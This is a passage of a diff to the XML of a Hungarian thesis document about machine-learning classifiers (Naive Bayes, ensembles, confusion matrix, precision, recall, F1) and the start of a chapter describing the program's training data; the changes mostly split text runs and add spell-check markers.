-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes-t használják</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használják</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12949,17 +14429,33 @@
         </w:rPr>
         <w:t xml:space="preserve">kkor </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Naive </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes tétel</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétel</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13220,12 +14716,28 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ensemble Methods</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ensemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Methods</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13396,7 +14908,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
+        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hiperparaméter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13451,6 +14977,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13460,8 +14987,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Confusion </w:t>
-      </w:r>
+        <w:t>Confusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13471,8 +14999,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13482,9 +15011,21 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>atrix</w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13562,6 +15103,7 @@
         </w:rPr>
         <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13572,8 +15114,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion </w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13590,7 +15140,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">trix </w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13626,6 +15183,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13638,12 +15196,14 @@
         </w:rPr>
         <w:t>onfusion</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13654,7 +15214,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13719,11 +15286,33 @@
         </w:rPr>
         <w:t>igaz pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">true positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13758,11 +15347,33 @@
         </w:rPr>
         <w:t>igaz negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">true negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13821,11 +15432,33 @@
         </w:rPr>
         <w:t>hamis pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13884,11 +15517,33 @@
         </w:rPr>
         <w:t>hamis negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13952,6 +15607,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -13960,6 +15616,7 @@
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13983,12 +15640,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14005,7 +15664,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(true positive) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14047,7 +15734,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (total predicted positive)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>predicted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14104,12 +15833,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14217,6 +15948,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -14225,6 +15957,7 @@
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14248,12 +15981,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14282,14 +16017,42 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (true positive)</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14324,19 +16087,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(total </w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>actual</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> positive)</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14404,12 +16197,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14547,8 +16342,18 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>F-1 score</w:t>
-      </w:r>
+        <w:t xml:space="preserve">F-1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>score</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14572,6 +16377,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Az F1 pontszám a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14582,7 +16388,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">recision </w:t>
+        <w:t>recision</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14596,6 +16409,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14606,7 +16420,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ecall </w:t>
+        <w:t>ecall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14674,24 +16495,28 @@
         </w:rPr>
         <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">, mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14810,6 +16635,3060 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ismertetem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>program</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kezdnem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, az adatgyűjtéssel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappában helyezked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ik el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
+            <wp:extent cx="3194214" cy="482625"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="9" name="Kép 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3194214" cy="482625"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
